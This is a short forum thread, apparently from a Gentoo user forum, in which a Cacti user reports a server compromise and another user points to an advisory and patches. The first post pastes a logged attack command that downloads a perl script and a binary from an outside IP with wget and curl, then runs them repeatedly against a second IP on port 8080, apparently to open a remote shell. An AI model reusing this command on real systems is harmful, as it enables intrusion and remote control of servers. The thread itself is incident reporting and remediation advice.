attack from my cacti

[mcsky2]

Hi,
I'm a gentoo user and my server use cacti :

Code: Select all

Available versions:  0.8.6h_p20060108-r2:0.8.6h_p20060108-r2
     Installed:           0.8.6h_p20060108 0.8.6h_p20060108-r1 0.8.6h_p20060108-r2 0.8.6i 0.8.6i-r1
     Homepage:            http://www.cacti.net/
     Description:         Cacti is a complete frontend to rrdtool

I was subjected to an attack (ps aux)

Code: Select all

apache   19147  8.6  0.1   2808  1240 ?        S    Jan16 206:19 sh -c cd '/var/www/localhost/htdocs/cacti' ; wget http://143.225.151.190/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 202.133.243.60 8080;wget http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080;curl -o ping http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080;cd /tmp/;curl -o temp2006 http://143.225.151.190/libsh/ping.txt;while [ 1 ];do perl temp2006 202.133.243.60 8080;done;wget http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080;curl -o ping http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080

I reboot my server.
Do you know this attack ? What is the parade ? Is my apache well-done ?

[fmangeant]

Hi

this attack is described here : http://forums.cacti.net/viewtopic.php?t=18846

You can use patches (which are available for 0.8.6h and 0.8.6i), or upgrade to 0.8.6j, released yesterday : http://forums.cacti.net/viewtopic.php?t=19166